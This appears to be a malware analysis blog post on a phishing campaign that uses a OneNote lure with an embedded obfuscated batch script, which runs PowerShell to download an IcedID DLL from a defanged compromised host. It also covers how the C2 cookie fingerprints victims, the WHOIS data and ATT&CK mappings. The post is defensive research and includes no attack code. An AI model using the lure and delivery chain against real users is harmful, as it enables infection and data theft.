So I recently came across an interesting in the wild Microsoft OneNote file being
distributed via email campaigns. Microsoft OneNote is a note-taking application
that is heavily used by millions of users on a daily basis. This makes these
users more vulnerable to such attacks as users tend to open these OneNote files
and click on the buttons seen on the screen.
Kill Chain
This campaign has a very interesting
kill chain that starts with an email and proceeds till it drops and executes
the final malware sample on the victim machine. To get a better understanding
of this campaign, see the kill chain given below.
(Fig. Cyber Kill Chain)
The campaign has a Microsoft
OneNote file named Payment_02_16_#522.one
being propagated that has some promising content written for the victims to
read as well as click at the same time. This OneNote file asks the users to
click the Open button in order to
receive the attachments from the cloud.
(Fig. Payment_02_16_#522.one)
As soon as the user clicks on the
Open button the kill chain starts to
work and begins the infection chain on the victim machine. A careful user would
immediately notice that once hovered over the Open button, you could clearly
see that there is an embedded .cmd file with the name 638121336423209150.cmd, that gets executed in the background once
clicked.
(Fig. Embedded Batch Script)
This is an embedded batch script file into the OneNote
lure that we have discussed earlier in this blog. This is a highly obfuscated
batch script that needed some de-obfuscation to get a better understanding of
what this script is doing.
(Fig. Obfuscated
638121336423209150.cmd)
Once de-obfuscated we can clearly see that this
batch script is executing powershell script to download the next stage payload.
(Fig. De-obfuscated
batch script executing powershell)
This powershell is downloading the next stage
payload from https://healthelevation360[.]com/image/015[.]gif, with an
interesting fact that this file is shown as a .gif file and is being saved to
the disk as xLeI.jpg into the
C:\ProgramData directory.
(Fig. 015.gif)
Clearly, healthelevation360[.]com is a compromised health
and fitness domain abused by the threat actors to distribute the malware files.
(Fig. Compromised healthelevation360[.]com domain)
xLeI.jpg (168e8a92e64f024346dd703ed9356f4e0bdf7d2130048e68da36291bbc9421a1)
This is a file downloaded and
saved to the victim’s disk at C:\ProgramData as an image file. On digging more
into this file shows that this is a 64-bit DLL (Dynamic Link Library) file
being run using rundll from the previous powershell script.
(Fig. 168e8a92e64f024346dd703ed9356f4e0bdf7d2130048e68da36291bbc9421a1)
This is none other than the
64-bit IcedID a.k.a BokBot malware payload being distributed in the wild. This
payload starts with system fingerprinting on the victim and sends a GET request
with a customised cookie value to the Command & Control domain: azergapolak[.]com
(Fig. GET Request with a Cookie using WinHttpSendRequest)
One of the most important part of
an IcedID campaign is the information it passes onto the C2 before dropping the
next stage payload and infect the victim. This information is passed in the
form of a cookie value.
(Fig. Cookie with rich information about victim)
This cookie has 6 important values that the C2 uses in order
to determine whether or not to continue infecting this victim machine.
·
__gads
This value holds the information about the
campaign identifier, a flag (always set to 1), time elapsed since the system is
up and running (using GetTickCount64), system information (using
ZwQuerySystemInformation)
·
_gat
This value holds the information about
Windows version the victim is using, pulled using RtlGetVersion
·
_ga
This value holds the information about the
processor, pulled using cpuid instruction
·
_u
This value holds the information about the
victim such as Computername (using GetComputerNameExA), Username (using
GetUsernameA) and VM detection
·
__io
This value holds the information regarding
the domain identifier pulled from the SID
·
_gid
This value holds the information regarding
the adapters on the local victim machine
This information is sent to the
C2 domain in the form of a cookie and the based on the response from the C2 the
next stage payload gets dropped onto the victim machine. Unfortunately, the C2
is down at the time of writing this blog and the payload could not be received from
the C2 (404 Error).
(Fig. Response from C2 Domain)
C2 Domain
Analysis
The C2 domain is quite newly
registered dated 18/11/2022, same can be verified with the WhoIs information of
the domain.
(Fig. C2 Domain WhoIs information)
We can see that the domain is
registered under the state of Charlestown, KN (which is a country code for Saint
Kitts and Nevis, a Country in the Caribbean). This domain is hosted on some
interesting NameServers with TLD(s): .no (Norway), .fo (Faroe Islands) and .in
(India).
|
Initial
Access |
·
T1566.001 - Phishing: Spearphishing
Attachment |
|
Execution |
·
T1059.001 - Command and Scripting
Interpreter: PowerShell ·
T1059.003 - Command and Scripting
Interpreter: Windows Command Shell |
|
Defense
Evasion |
·
T1497.001 - Virtualization/Sandbox Evasion:
System Checks ·
T1218.011 - System Binary Proxy Execution:
Rundll32 ·
T1036 - Masquerading |
|
Discovery |
·
T1033 - System Owner/User Discovery ·
T1082 - System Information Discovery |
|
Command
and Control |
·
T1071.001 - Application Layer Protocol: Web
Protocols |
|
Exfiltration |
·
T1041 - Exfiltration Over C2 Channel |
Comments
Post a Comment